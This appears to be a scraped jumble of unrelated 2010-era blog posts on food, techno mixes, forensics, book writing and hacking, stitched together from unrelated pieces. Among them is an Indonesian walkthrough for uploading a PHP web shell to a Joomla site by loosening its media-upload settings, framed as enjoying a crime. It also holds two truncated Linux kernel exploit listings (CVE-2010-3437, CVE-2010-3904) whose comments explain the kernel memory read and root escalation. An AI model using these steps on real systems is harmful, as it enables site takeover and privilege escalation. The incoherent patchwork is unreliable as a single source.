Woman And computer
Human And Computer

Download Hakin9 Magazine For January

Labels:

Hakin9 is an e-magazine which talks about Ethical Hacking and Security issues, I just came across the its website Hakin9.org and had a look at some magazines they were awesome, So I though to share it here on RHA, This Months Issue is related to Cybercrime and Cyberwar Predictions for 2011 which contains information related to following issues.



  •  Cybercrime and Cyberwar Predictions for 201
  •  The Social Web Threat
  •  Pros and cons of partial passwords in web applications
  •  Target Attacks via Email
  • Spyware Threat Invades BlackBerry App World 
  • The Social Web Threat
And Much more

So what are you waiting for go ahead and Download Hakin9 magazine for january here

Happy New Year To RHA Readers

Labels:

Year 2010 has been a wonderful year here on RHA(Rafay Hacking Articles), We wish you all a very happy 2011 to all of all readers. The Year 2010 has been really amazing in terms of Traffic and Revenue too, We Doubled our Daily Traffic and so as the revenue generated from the blog, I Wrote my first book on Ethical Hacking "A Beginners Guide To Ethical Hacking" and got Interviewed.



Goals For 2011

I have lots of goals for 2011 and some of them are as Follows:
  • Launch Facebook Hacking Video Series
  • Write an E-Book on Malware and Viruses
  • Launch a Membership Website
  • Take Techlotips.com to the next level
And Much More.

Top Posts of 2010 on RHA

Here are the top posts of RHA in the year 2010:
Right now I am in karachi where I will be celebrating new year, Tell us how will celebrate the new year?

Welcome Lara and Gloria!

Labels: ,

The babies are here! After 38 weeks waiting and 48 hours labor, Lara Lily and Gloria Sophie were born on Wednesday, Dec 29th, in Heidelberg.


We wish all our readers a great start into the year 2011!

Quattro Bar's Signature Dishes

Quattro Bar is not just for beer lovers. One could also go there for the food.






Gargantuan Red Horse and I beside a bibingka stand LOL

Quattro has teamed up with Unilever Food Solutions (UFS) to give loyal patrons and alcohol-loving foodies its signature dish: Japanese Chicken Adobo.





Two words: Beer Match. Love the generous portions. Love the sweet spicy sauce. Love the crispy garlic

into light


i really love the transition from one year to the next. a great opportunity to reflect on the year past, and prepare for the year ahead. i'm still processing everything that happened in 2010, but it has definitely been a great year. a lot of special moments, memories and experiences... i've been very lucky to be surrounded and supported by a lot of excellent people, and i'm deeply thankful to all of them: yuri, peter, dave, ben, and the labyrinth family: russ, yasuyo and the rest of the hooligirls, donato, peter vh, plus all the other ssgs out there. thank you. this mix is for all of you.

chris - into light mix

excited for 2011. lets make it an even better year.

Plugged

Heh. "Extra Credits," one of those shows what uses lots of big words, gave "The Game OverThinker" a plug at the top of their newest episode.



I'm sure The OverThinker is totally grateful - or, at least he would be if I hadn't exiled him to a haunted forest in rural Minnesota ;)

Must-Try: Tiyan of Ostrich at Moomba Bar Cafe

LOL Fact about me: I enrolled in ABSCBN's summer dance workshops at the age of 20.

It was a lot of fun but there's a catch: I'm I'm the oldest grape in the bunch. My classmates were just 11-17 y/os so I was automatically promoted to the level of "Ate." Harharhar. Coming from Caloocan, my usual route to class include passing by Roces Avenue to get rid of the nasty Q.Ave traffic. I vividly

Manila Signature Dish: Bordeaux





Bordeaux is one of the restaurants chosen by Unilever Food Solutions (UFS) to include in its roster of Manila's Signature Dishes 2010. Several dishes were handpicked from their menu to came up with a set that would best represent the restaurant's identity. Created by Chef Edward Narvaez, the set highlights Gambas ala Rochelle and Boeuf Bourguignon.




Gambas ala Rochelle



I'm thankful that

Black Hat Hacker�s Tricks To Hack Into Secure Systems

Labels:

Black hat hacking is the term given to the course of action on protruding into the security system of a computer to get access to the computer network connectivity with out the knowledge of the authentication party. As long as the internet connectivity serves in best message transaction and other such features of information storage, black hat hackers are expected to play their role of hacking the secure private data.
There are a variety of hacking tips and techniques that each hacker exploits challenging to crack the system security. We also have certain software applications to make the hacking progression easier. Black hat Hackers makes their toils on the psychological stipulations to inflate the crack deep for passwords and user id of a system. As Security openness is one of the ill-fated and obvious parts of computation structure today.

Black hat tips and techniques

Black hat briefings brings together a team of legislative body from federal organization along with a set of professional and expertise hackers towards a conference on keeping up computer security. Black hat briefings and trainings are being provided from specific vendors who work upon neutralizing the vendor conferencing.

Black hat cloaking is a form of Search Engine Optimization approach where the data passed to the search engine spider is varied from that of the user�s browser. It is performed based on the user agent HTTP header who requests for the page. The rationale of the black hat cloaking is to swindle the search engine to exhibit the page at times of not available to display.

Ollydbg and IDA pro are the effective hacker tools that are well-versed in debugging, which is utilized generally to analysis and sort out the set of codes. Ollydbg is limited to function with 32 bit files while IDA pro can work on 32 as well as 64 bit files.

Usually a computer system or phone or network is being hacked for malevolent motive such as fraudulence over credit cards, identity cards, piracy and theft of data from secure systems. Jonathan James, Adrian Lamom and Kevin Mitnick holds the top place in perfect hacking technique.

Both the black hat hackers and white hat crackers come up with similar pattern of cracking the system�s security to make their job done. In a hacker tool box one can find various tools that are being utilized in hacking course of time as they discover and utilize the network with special softwares to overturn a series of coding.

Author bio

Corliss Jennica, The author of this article has got keen knowledge on bringing out various issues related to the black hat hackers technique. Feel free to contact her on further hacking tips and guidance on computer system security.

Manila Signature Dish: Outback Steakhouse

For those who frequent Makati malls, you'll probably be familiar with Glorietta 4's Outback Steakhouse. The mall's iconic facade has rows and rows of establishments that lures onlookers (shopaholics or not) to their den. Part of the club is Outback Steakhouse. It has become well-known for its generous portions and casual set-up making it a favorite among families, barkadas, and--in Glorietta

Manila's Signature Dishes 2010: The Terrace at the 5th

Terrace at the 5th is a relatively young restaurant (opened in 2008) quietly tucked along Greenbelt 5's strip. A collaboration between Chef Cecile Ysmael and Chef Cheryl Pineda, the place provides a feeling of warmth and relaxation.




The Terrace at the 5th





The green interiors and high ceiling exude a homey yet classy dining ambiance

Partnering with Unilever Food Solutions (UFS), the

Mining MSRC analysis for forensic info

Labels: ,

Anyone who's followed this blog for a while is familiar with...call them my "rants"...against AV vendors and the information they post about malware; specifically, AV vendors and malware analysts have, right in front of them, information that is extremely useful to incident responders and forensic analysts, but they do not release or share it, because they do not recognize its value. This could be due to the AV mindset, or it could be due to their business model (the more I think about that, the more it sounds like a chicken-egg discussion...).

When I was on the IBM ISS ERS team, we did a good deal of malware response. In several instances, team members were on-site with an AV vendor rep, whose focus was to get a copy of the malware to his RE team, so that an updated signature file could be provided to the customer. However, in the time it takes to get all this done, the customer is hemorrhaging...systems are getting infected and re-infected, data is/maybe flooding off of the infrastructure, etc. Relying on known malware characteristics, our team members were able to assist in stemming the tide and getting the customer on the road to recovery, even in the face of polymorphic malware.

What I find useful sometimes is to look at malware write-ups from several sites, and search across the 'net (via Google) to see what others may be saying about either the malware or specific artifacts.

I watched this video recently, in which Bruce Dang of Microsoft's MSRC talked about analyzing StuxNet to figure out what it did/does. The video is of a conference presentation, and I'd have to say that if you get get past Bruce saying "what the f*ck" way too many times, there's some really good information that he discusses, not just for malware RE folks, but also for forensic analysts. Here are some things I came away with after watching the video:

Real analysis involves symbiotic relationships. I've found this to be very true in some of the analysis I've done. I have worked very closely with our own RE guy, giving him copies of the malware, dependency files (ie, DLLs), and information such as paths, Registry keys, etc. In return, I've received unique strings, domain names, etc., which I've rolled back into iterative analysis. As such, we've been able to develop analysis that is much greater than the sum of its parts. This is also good reason to keep a copy of Windows Internals on your bookshelf, and keep a copy of Malware Analyst's Cookbook within easy reach.

Malware may behave differently based on the eco-system. I've seen a number of times where malware behaves differently based on the eco-system it infects. For example, Zeus takes different steps if the infected user has Administrator rights or not. I've seen other malware infections be greatly hampered by the fact that the user who got infected was a regular user and not an admin...indicating that the variant does not have a mechanism for check for and handling different privilege levels. Based on what Bruce discussed in his presentation, StuxNet takes different steps depending upon the version of Windows (i.e., XP vs. Vista+) that its running on.

Task Scheduler. I hear the question all the time, "what's different in Windows 7, as compared to XP?" Well, this seems to be a never ending list. Oy. Vista systems (and above) use Task Scheduler 2.0, which is different from the version that runs on XP/Windows 2003 in a number of ways. For example, TS 1.o .job files are binary, whereas TS 2.0 files are XML based. Also, according to Bruce's presentation, when a task is created, a checksum for the task .job file is computed and stored in the Registry. Before the task is run, the checksum is recalculated and compared to the stored value, to check for corruption. Bruce stated that when StuxNet hit, the hash algorithm used was CRC32, and that generating collisions for this algorithm is relatively easy...because that's part of what StuxNet does. Bruce mentioned that the algorithm has since been updated to SHA-256.

The Registry key in question is:

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache

A lot more research needs to be done regarding how forensic analysts (and incident responders) can parse and use the information in this key, and in its subkeys and values.

MOF files. Bruce mentioned in his presentation that Windows has a thread that continually polls the system32\wbem\mof directory looking for new files, and when it finds one, runs it. In short, MOF files are compiled scripts, and StuxNet used such a file to launch an executable; in short, put the file in as a Guest, the executable referenced in the file gets run as System.

Management needs actionable information. This is true in a number of situations, not just the kind of analysis work that Bruce was performing. This also applies to IR and DF tasks, as well...sure, analysts can find a lot of "neat" and extremely technical stuff, but the hard part...and what we're paid to do...is to translate that wealth of technical information into actionable intelligence that the customer can use to make decisions, within their environment. What good does it do a customer if you pile a 70 page report on them, expecting them to sift through it for data, and figure out how to use it? I've actually seen analysts write reports, and when I've asked about the significance or usefulness of specific items, been told, "...they can Google it." Uh...no. So, through experience, Bruce's point is well-taken...analysts sift through all of the data to produce the nuggets, then filter those to produce actionable intelligence that someone else can use to make decisions.

A final thought, not based specifically on the video...it helps forensic analysts and incident responders to engage sources that are ancillary to their field, and not directly related specifically to what we do every day. This helps us to see the forest for the trees, as it were...

a year in mixes


recently we went through our favourite mixes of 2010, but this list was definitely incomplete, as it excluded many of the mixes we listened to and loved the most, our own! this year has been another big year for mixes on mnml ssgs. actually we planned to do fewer mixes, but some how this didn't quite happen... anyway, what i wanted to do in this post was just review what we've had on mnml ssgs this year, encouraging you to discover any you might have missed and revisit the others.

an important shift this year was the 'official' series effectively coming to an end with peter van hoesen's mx50 back at the start of march. this proved a fitting finish - peter has played an important role in the development of mnml ssgs and we are very proud of both the mixes we've had from him so far. the shift from the 'official' series to the more loosely focused ssg 'specials' was, more than anything, a way to give ourselves the freedom to present a wider range of artists, sounds and styles. we were starting to feel a bit constricted by the 'official' series, and while we were uncertain about finishing them, we are very happy with the results. it has definitely given us some more space to explore a wider range of sounds, as you can see and hear.

we are intensely proud of what we've accomplished this year, and we would like to thank all of you for your continued support, and for having faith in our selections, and continuing to download our mixes, whether they be from big names or newcomers. massive thanks also goes to official.fm, who have hosted all of our mixes and have been big supporters of us from early on. if you ever post ssg mixes elsewhere, please use the official.fm link - unlimited, quick downloads, it is the easiest way to get access to our whole archive of mixes. and, of course, none of this would not have been possible without all the artists that contributed mixes. we are constantly overwhelmed with the remarkably high quality of mixes people put together. we ask them to dig deep and deliver something special, and this is almost always what happens. thank you.

mnml ssgs mxs

mx46: levon vincent. what a fantastic way to start 2010. levon dug deep to give us a special mix to bring in the new year.

mx47: oni ayhun. this was a difficult mix to make happened, but we were determined. as soon as we first oni, we had to have him on mnml ssgs. powerful, distinctive sounds. this is what the ssgs love.

mx48: redshape. the picture redshape gave us for this mix was of the inside of his mask. this is most fitting for a very personal and revealing journey. a stunning mix.

mx49: natural/electronic.system. two of our favourite boys from italy returned to give us a second mix, this time encapsulating some of the feelings and inspiration from their performance at labyrinth in 2009.

mx50: peter van hoesen. this has been our most downloaded mix of 2010. there is a good reason from that. inspirational mix from our pvh that brought the 'official' series to a fitting end.

ssg specials

falko brocksieper. falko dropping this mix our way was the spur to start our ssg specials, and what a great way to commence. lovely low slung, grooving mix from a favourite of ours.

claudio fabrianesi. and back to italy we go... we lined this up after hearing his collaboration with dozzy (which came out on mule). quality slow burning house from claudio.

patrick walker. forward strategy group make the kind of techno we like, so it was a real pleasure to host this tight mix from one half of FSG. patrick really knows his techno and it shows here.

eli verveine. we have a massive soft spot for this girl. few DJs manage to convey such warmth in their mixes. a charming effort from one of our favourites.

deer. this live recording from deer has received a lot of excellent feedback throughout the year and introduced his sounds to plenty of new ears. our main complaint is that much of this remains unreleased, hopefully that will be rectified in the future!

DDKH. plenty of people slept on this one because we didn't announce that the DD meant Donato Dozzy. but if you listened to the mix, you should have been able to work out who it was pretty quickly. as is usually the case when dozzy plays, there are some truly transcendental moments in this mix.

finn johannsen. diverse, engaging, strangely cohesive. finn has a great nose for interesting records and always manages to present them in a way that grabs your attention.

kevin gorman. after delivering one of the highlights in the 'official' series, kevin returned with an expertly structured DJ set. starting ambient and slowly building, this one just grows and grows.

october. i remember the first time i listened to this. when it opened with actress, and followed by moodymann, i had the feeling it was going to be a great mix. and it is. quality stuff from october. expecting big things from him in 2011.

june. a new name to us, but after hearing the lovely of june01 EP, we were curious to hear how he'd sound in the mix. and the results were impressive. classic sounds presented with style. if you missed this one because you didn't recognise the name, i'd suggest grabbing it now.

prosumer. we've been huge fans of prosumer for a long time. it was an absolute pleasure to be able to host a mix from him. as always, in this mix he puts a big smile on your face.

john osborn. this mix is really what mnml ssgs is all about. after many emails over a long period of time, i finally met john on the dancefloor of p-bar and he told me he had a special mix for us. and he was right, this one is definitely special. the response to this mix was huge, and we are very happy john shared it with the ssgs.

roger23. roger is just an out and out DJ. he knows his records, and he knows how to play them right. no bullshit here. just quality music presented and shared with care.

kettenkarussell. as the saying goes, good things come to those that wait. in this case, excellent things come to those that wait. it took a while to make this happen, but it was definitely worth it. a delightful effort by this duo. if you passed this one by because you didn't know the name, i'd suggest giving it a listen. it's a real treat.

steffi. in preparation for her debut at labyrinth, we asked steffi to put together a mix for us, and the results were impressive, to say the least... a pretty clear demonstration of why steffi is one of the best DJs around.

mike pollard. a beautiful mixtape of ambient and synth soundscapes from the label boss of arbor records. music for floating and dreaming.

blackest ever black. this is one label that immediately got our attention with its very strong aesthetic and attitude, which is amply conveyed on the mixtape they gave us. arresting music that demands your attention.

delta funktionen. 2010 was a breakout year for delta, and you can hear why listening to this brilliant 3 hour mix. carefully built, adding piece by piece, setting up the night: this is the way to play a warm up set.

sigha. if anyone had any doubt about how to classify sigha, this mix was a very clear demonstration of his techno credentials. this is another person i'm expecting big things from in 2011.

ancient methods. no one can quite do power techno like ancient methods. this mix again demonstrated why they are one of the most compelling voices in techno music today.

the black dog and regis. an absolute honour to host such a special mix from these foundational figures. it also happens to be a brilliant mix.

felix k. the man behind hidden hawaii covers everything across these two mixes from techno, house, dubstep to d & b. both mixes have a very intuitive feel to them. this guy can definitely DJ.

senking. the man responsible for one of our albums of 2010 put together a killer livepa of deepwater techno and bass music. don't miss this.

donato dozzy. what better way to finish a year of mixes than with donato recreating his opening kosmische set from labyrinth. timeless music presented in a way that only dozzy can.

ok, i think that is all of them! add in some lovely sunday sounds mixes, a few poorly mixed efforts from myself and some other treats, and this really has been a big year of music for us here on mnml ssgs... we are still planning for 2011, but you can expect plenty more quality mixes here. i'm sure there will be new mixes from quite a few of the names here, who are part of the ssg family, as well as many fresh names and sounds.

we've already got our first mix lined up for the new year and it's a beauty. until then, we encourage you to go back and enjoy again some of the amazing mixes we've had in 2010. thanks again.

Linux Kernel 2.6.36 Kernel Memory Disclosure

Labels:

/*

* cve-2010-3437.c
*
* Linux Kernel <>
* Jon Oberheide
* http://jon.oberheide.org
*
* Information:
*
* https://bugzilla.redhat.com/show_bug.cgi?id=638085
*
* The PKT_CTRL_CMD_STATUS device ioctl retrieves a pointer to a
* pktcdvd_device from the global pkt_devs array. The index into this
* array is provided directly by the user and is a signed integer, so the
* comparison to ensure that it falls within the bounds of this array will
* fail when provided with a negative index.
*
* Usage:
*
* $ gcc cve-2010-3437.c -o cve-2010-3437
* $ ./cve-2010-3437
* usage: ./cve-2010-3437
* $ ./cve-2010-3437 0xc0102290 64
* [+] searching for pkt_devs kernel symbol...
* [+] found pkt_devs at 0xc086fcc0
* [+] opening pktcdvd device...
* [+] calculated dereference address of 0x790070c0
* [+] mapping page at 0x79007000 for pktcdvd_device dereference...
* [+] setting up fake pktcdvd_device structure...
* [+] dumping kmem from 0xc0102290 to 0xc01022d0 via malformed ioctls...
* [+] dumping kmem to output...
*
* 55 89 e5 0f 1f 44 00 00 8b 48 3c 8b 50 04 8b ...
* 55 89 e5 57 56 53 0f 1f 44 00 00 89 d3 89 e2 ...
*
* Notes:
*
* Pass the desired kernel memory address and dump length as arguments.
*
* We can disclose 4 bytes of arbitrary kernel memory per ioctl call by
* specifying a large negative device index, causing the kernel to
* dereference to our fake pktcdvd_device structure in userspace and copy
* data to userspace from an attacker-controlled address. Since only 4
* bytes of kmem are disclosed per ioctl call, large dump sizes may take a
* few seconds.
*
* Tested on Ubuntu Lucid 10.04. 32-bit only for now.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

Download Full

Covert Penetration

In what sometimes feels like a past life after a heavy day dealing with botnets, I remember fondly many of the covert and physical penetration tests I've worked on or had teams engaged in.

Depending upon the goals of the penetration test, things like installing physical keyloggers on the receptionists computer (doing this surreptitiously while engaged in conversation with the receptionist - hands dangling down the back of the computer...) in order to capture emails and physical door entry codes, dropping a little wireless Compaq/HP iPaq in the plant-pot for a day of wireless sniffing etc., dropping "malware" infected USB keys in the office car park in the morning (waiting for the "finders" to check them out on their office computer by lunchtime) and pretending to be official fire extinguisher inspectors and getting access (and a little alone-time) in their server farm.

Anyhow, today I spotted an interesting gadget that would have been pretty helpful on many of these physical engagements - The PlugBot. It's a wireless PC inside what looks like a plug adapter.

If you're not a penetration tester - perhaps you should read about it anyway. Something to "keep an eye on" within your own organization then.

some of my best labels from 2010


ok, continuing along with my end of year stuff... same deal as the previous lists. this is all pretty subjective and incomplete. when it comes for labels, i am much more interested in quality than quantity. i don't care if a label only had a few releases, if they were very high quality, that's enough for me. also it is my list so it is going to differ a bit from some of the other ones floating about. there is plenty of stuff i just haven't listened to. anyway, here we go:

some of chris' best labels of 2010 (in random order)

raster-noton: i struggle to think of a label that has been consistently as good for such a long period of time as raster-noton. again, in 2010 they continued to push things forward in that unique raster style. senking's 'pong' is clearly one of the best albums of the year, ANBB's album was pretty strong, and the original EP even stronger. the kanding ray EP is top notch too. a lot of people rate the mark fell album, but i can't bring myself to check it. i have never been able to get into SND.

delsin / ann aimee: you gotta love these guys. nothing fancy, no big hype. just quality music on a remarkably regular basis. great EPs from delta funktionen especially, also redshape, brendon moeller, and finishing the year with an excellent remix EP of morphosis. i'll be surprised if they are not on my list again next year.

sandwell district / downwards: not sure whether these two should be separated or put together, but the way i view them SD and downwards are two different arms of basically the same enterprise / collective. the SD album is finally out, and it is an impressive album. earlier in the year there was the 2 part sampler, which was effectively an album in itself. SD are not remaking techno, they are definitely working within established genre structures, but they are pushing and pulling it in some interesting and distinctive ways. meanwhile downwards had the killer EP from sandra electronics (aka regis and silent servant), as well diverse and interesting releases from dva damas and six six seconds.

semantica: the quiet achievers of 2010. as i mentioned, my track of the year is the regis remix of svreca. the instra:mental EP is great, and they've had some quality tracks and remixes from serious names such as ERP, dettmann, silent servant, oscar mulero and claro intellecto. we should have a ssg special from label boss svreca early in 2011, which i am looking forward to!

kontra musik: this is another label that had a very strong year without too many people noticing. they started out with a great remix EP of jason fine, with oni ayhun and ben klock both giving excellent versions. add in one of my tracks of the year from gunnar jonsson, a gorgeous jason fine release and a very interesting effort from kondens. every release kontra had this year was worth picking up. you can't say that about many labels.

something in the sky: jeff mills returned in a big way in 2010 and the stuff he put out on his new sublabel was jeff back at his very best. powerful, spacey techno. millsart baby!

blackest ever black: ok, so they only had 2 releases, and these came out towards the end of the year. but every track across the 2 EPs is remarkably strong. and there are not many releases i've listened to more than these, so that's enough for me.

honest jon's: actress, t++, mvo were the ones i heard and loved. still got a couple of releases from these guys i need to check. hard to argue with the year they had. bold, innovative, interesting: honest jon's are doing it right.

i'll stop there. as i said, this is just my list, so it is missing plenty of labels that had a very good 2010. rush-hour had a very strong year no doubt. but to be blunt, i didn't listen to much of it. the only stuff i got from them - admittedly both excellent - was the virgo rerelease and the gorgeous bnjmn EP (if you can track this down, get yourself a copy). punch drunk put out some great music too, and mathematics had some gems (but they released too much). there were a couple of techno labels that had very solid years (notably T2X). saying that, there are some other labels that i've very consciously excluded. ostgut had a good year, not a great one, while the year r & s had was more hype than substance. also, given the tendency to focus on big labels, i'm surprised fabric hasn't gotten much love, considering some of the releases they've had this year: d-bridge & instra:mental, optimo, surgeon and shackleton. they've been pushing some interesting stuff... 

anyway, please add your picks in the comments. i'd be interested in hearing some smaller / less obvious labels that we might have missed.

Linux RDS Protocol Local Privilege Escalation

/*

* Linux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit
* CVE-2010-3904
* by Dan Rosenberg
*
* Copyright 2010 Virtual Security Research, LLC
*
* The handling functions for sending and receiving RDS messages
* use unchecked __copy_*_user_inatomic functions without any
* access checks on user-provided pointers. As a result, by
* passing a kernel address as an iovec base address in recvmsg-style
* calls, a local user can overwrite arbitrary kernel memory, which
* can easily be used to escalate privileges to root. Alternatively,
* an arbitrary kernel read can be performed via sendmsg calls.
*
* This exploit is simple - it resolves a few kernel symbols,
* sets the security_ops to the default structure, then overwrites
* a function pointer (ptrace_traceme) in that structure to point
* to the payload. After triggering the payload, the original
* value is restored. Hard-coding the offset of this function
* pointer is a bit inelegant, but I wanted to keep it simple and
* architecture-independent (i.e. no inline assembly).
*
* The vulnerability is yet another example of why you shouldn't
* allow loading of random packet families unless you actually
* need them.
*
* Greets to spender, kees, taviso, hawkes, team lollerskaters,
* joberheide, bla, sts, and VSR
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define RECVPORT 5555
#define SENDPORT 6666
int prep_sock(int port)

Download Full


Easy Upload Shell in Joomla

Labels:

Ada simple trik untuk mengupload shell di cms joomla, mungkin udah banyak yang tahu tentang ini. Sebenarnya memakai aplikasi kayak ninja explorer juga bisa sih, tapi kalau koneksi kita lemot kan agak lumayan merepotkan ,atau kalau gak si admin setting biar tidak ada aplikasi yang boleh di install, nah ini caranya gan, lebih praktis juga loh. Langsung aja lah..

Persiapan pertama sudah ada site joomla yang jadi target, sama siapkan shell/ injector. Kalau semua sudah beres langsung saja kita praktekkan.
jangan lupa kopi + rokok, biar lancar awkakwkakwkawk

1. Kalau sudah masuk di cmsnya kan ada tuh menu-menu atau kotak-kotak dibagian tengah, atau klik site > pilih Global Configuration, kalau udah Pilih System, lihat gambar dibawah ini.

2. Pada bagian Media Settings, Legal Extensions (File Types) kita harus merubah salah satu ekstensi disitu contoh yang bisa kita rubah adalah ODP atau ODG ada juga JPG. Rubahlah jadi PHP, kalau sudah liaht pada bagian Restrict Uploads dan Check MIME Types, kalau default itu di centang ke YES, nah kita rubah lah jadi NO.
Perhatiin pada bagian Legal MIME Types nah pada bagian disitu kan banyak tuh tulisan kayak image/jpeg,image/gif,image dll lah, pilih pada bagian belakang klo gak salah X-ZIP atau yang mana aja terserah pokoknya rubah jadi PHP. Kalau sudah di save then NEXT STEP.

3. Pada langkah nomor 2 kalau berahasil ada tulisan �The Global Configuration details have been updated.� klo gagal �An Error has occurred! Unable to open configuration.php file to write!�.Kalau ternyata gagal, anda bisa melakukan cara lain dengan mengganti source index.php templates dengan source injector kamu.
disini kita ngomongin yang berhasil, kalau berahasil pilih MEDIA MANAGER. Perhatikan pada bagian bawah, Upload file injector atau shell anda. misalkan : shell.php
kalau sukses, hasilnya seperti screen shoot dibawah ini..

4. Selanjutnya pemanggilan URL shell nya seperti ini: http://[localhost]/images/shell.php

Mudah kan,gagaga...selamat menikmati hasil kejahatan anda..
Just share buat newbie,yang udah mastah dilarang keras baca ini artikel..!!

Protect WordPress Directory with .Htaccess

Labels:

Kembali lagi ma ane gan, kali ini kita membahas soal keamanan wordpress,kita membahas salah satu keamanan seperti judul di atas, dengan file .htaccess. Mungkin banyak yang sudah tahu atau yang sudah membahas tentang ini,tapi tidak ada salahnya jika mau dishare lagi.. :D

Mari kita bahas tentang file .htaccess,apa itu .htacess..? file .htaccess adalah file teks ASCII yang terletak di dalam root direktori biasanya �public_html� atau klo hosting free di �htdocsyang sering digunakan untuk mengubah pengaturan default dari web server yang digunakan. Sehingga manfaat dari file .htaccess ini besar sekali. Dan merupakan Web Utility yang sering digunakan oleh para web master.
lalu apa saja yang harus di amankan di wordpress.?bnyak gan,conthnya /wp-admin,/wp-includes,wp-login.php,wp-db.php,wp-config.php ./etc..
langsung aja gan, source code yang nanti ane kasih agan tinggal copy lalu paste aja di .htaccess,udah tahu kali.. :D

Akses halaman /Wp-Admin Login dengan Private IP/Single IP

AuthUserFile /dev/null

AuthGroupFile /dev/null

AuthName �Access Control�

AuthType Basic

order deny,allow

deny from all

# IP address sobat

allow from **.***.***.**

Coba perhatikan sama huruf yang berwarna merah itu gan, **.***.***.** rubah sama IP agan,jadi khusus satu IP aja yang bisa akses halaman itu.. :D
Terus gimana dengan wp-login.php itu juga sama kan buat login..? Hmm tenang gan, kita lanjut ke wp-login.php, pake private IP juga.. :D

Order deny,allow

Deny from All

Allow from **.***.***.**

sama seperti diatas, ganti tulisan yang berwarna merah pake IP agan, kalau buat yang IP nya dinamis mending tidak usah, coz itu cuma buat satu IP doanq,

Amankan Wp-Config.php

Lanjut gan,sekarang kita mw amanin file wp-config.php,dh tahu kan wp-config.php itu kegunaanya,maka dari itu mari kita amankan.. :D
nih codenya..

# protect wpconfig.php

order allow,deny

deny from all

Selajutnya kita bahas kebagian direktori Wp-includes,nah klo kata orang-orang sih di dalem direktori wp-includes itu ada wp-db.php yang bisa ngebongkar semua data penting kita gan,
buat jaga-jaga wp-includes dari serangan yang gk berwenang buat file index.php atau index.html di direktori itu gan. Untuk wp-db.php coba agan akses, adanya di wp-includes/wp-db.php pasti terjadi error gitu kan, klo emang disitu kelemahanya marilah kita tutupi, caranya buat file .htaccess dibagian di rektori wp-includes, terus isi sama code ini..


RewriteEngine On
RewriteBase /
RewriteRule .*\.php$ readme.html [L]

Perhatikan sama tulisan yang berwarna merah itu, itu file readme dari wordpress, nah kita coba mengalihkan file wp-db.php ke file readme.html dengan cara di atas.

Ok selesai,semoga bermanfaat dan berguna.. :D

Writing Books, pt IV

Labels:

Okay, by now, you've probably/likely decided to write that book, and that you've opted to do so through a publisher to get it on the bookshelves and onto Kindles and other ereaders. Remember, this isn't the only way to get something published, but it is one of the only ways to get your book published and have someone else take care of getting it on shelves and in front of your intended audience through Amazon, etc. Your alternatives include self-publishing through sites like Lulu.com, or simply writing your "book" and printing your manuscript to a PDF file, rather than a printer. There are advantages and disadvantages to each approach, but we're going to go with the assumption that you'll be working with a publisher.

Working with the publisher
When you're working with the publisher, don't set your expectations (at all, or too high) of what that's like ahead of time. Remember, the publisher's staff are people, too, and may be working with multiple authors. You very likely won't be the only author that they're working with, nor the only schedule. In addition, remember that in the current economy many people are wearing multiple hats in their jobs...so the editor you're dealing with may not get your email because they're traveling or at a book show. I've worked with staff who, in 2009/2010, do not have remote access to their email (can you imagine that??), so I won't hear back from them for weeks at a time.

While working with the publisher, I've had editors and even editors assistants changed part way through the writing process. The result was that chapters that I had sent in for review could no longer be found. I know this sounds like a bit much, but keep track of what you send in, when, and to whom. This can really help...particularly in instances where you have to resend things.

One of the things I've run into several times is that I've submitted what I thought was everything...DVD contents, revised chapters, etc...and asked the staff I was working with if everything was received, and if I needed to provide anything else. I'd been told, no, that's everything...only to be contacted three weeks later and told that something else was needed (review the proofs, provide a bio, etc.). The key to this is to see what's in other books, and keep a list of what you've provided...have you written a preface yet? A bio? How about that acknowledgment or the dedication page?

In short, be flexible. Focus on meeting your schedule in the contract. If you're not going to meet the schedule for some reason, do the professional thing and let them know ahead of time. Don't worry about what anyone else does or is doing. In the long run, it'll help.

Working with reviewers
When you're working with reviewers, keep in mind what their role is in the process. They're generally there to review your work, so don't take what they say or comment on personally.

There are generally two kinds of reviewers...those who do the grammar, spelling and formatting review for the publisher (they tend to work for the publisher), and those who are supposed to review your work from a technical perspective, to ensure that it's accurate (although why you'd put that amount of time into writing something that is completely off base, I have no idea). Generally speaking, whatever the grammar/spelling reviewer suggests is probably advisable to accept. However, this won't always be the case, particularly when you've written a turn of phrase that you really want to use, or are using acronyms specific to your field. I remember that I had an issue with the acronym "MAC"...did it refer to file "MAC" times, or to a NIC's "MAC" address? Kind of depended on the chapter and context.

As far as your technical reviewers go, that's another story. There's no reason that you have to accept any of their proposed changes, or follow what their comments say. Hey, I know that's kind of blunt, but that's the reality of it. In every book I've worked on, to my knowledge, the technical reviewer has had no prior contact with me, my book proposal, or my thought process prior to getting my draft chapters. Therefore, they are missing a great deal of context...and in some cases, their comments have made little sense when you consider the overall scope and direction of the book.

For some reason, the publishing process seems to be something of a maze of Chinese walls. You get an author who's writing a technical book, working with a publisher who knows publishing, but not the subject that's being addressed. One person reviewing the book and working for the publisher knows spelling, grammar, and formatting, and that's good...but often times, the technical reviewer may not know a great deal about the subject being addressed, and knows nothing at all about the author, the goals and direction of the book, or much in the way of overall context. In my mind, this is just a short-coming of the process, and something that you need to keep in mind. I've worked with a LOT of folks with respect to writing technical reports, and there are generally two things that most folks do with suggested changes and comments...they either accept them all unconditionally, or they delete and ignore them. I would suggest that when you are going through the document that you receive back from the technical reviewer, make your changes and add your own comments to theirs, justifying your actions. Then save the document, copy it, and (if it's written in MSWord) run the copy through the document inspection process, accepting the edits and removing comments. That way, you have a clean copy to send back, but you also have a clear record of what was suggested and what you chose to do about it.

Another thing to keep in mind is that people have varying schedules...if you submit a couple of chapters and you feel that you aren't getting much in the way of a review, or one that's technical, get in touch with the editor and request someone else. Or, suggest someone to them up front...after all, if you really know the subject that you're writing about, you will likely know someone else in the field who (a) knows enough about it to review your work, (b) has the time to do a good review, and (c) has the interest in working with you. I've had folks offer to review my work completely aside from the publisher...that's okay, too, but it also means you may submit a chapter and not hear back at all. Remember, in the technical field, you don't make enough money to support yourself writing books, so neither writing nor reviewing books is a full-time job, and people have day jobs, too.

Working with co-authors

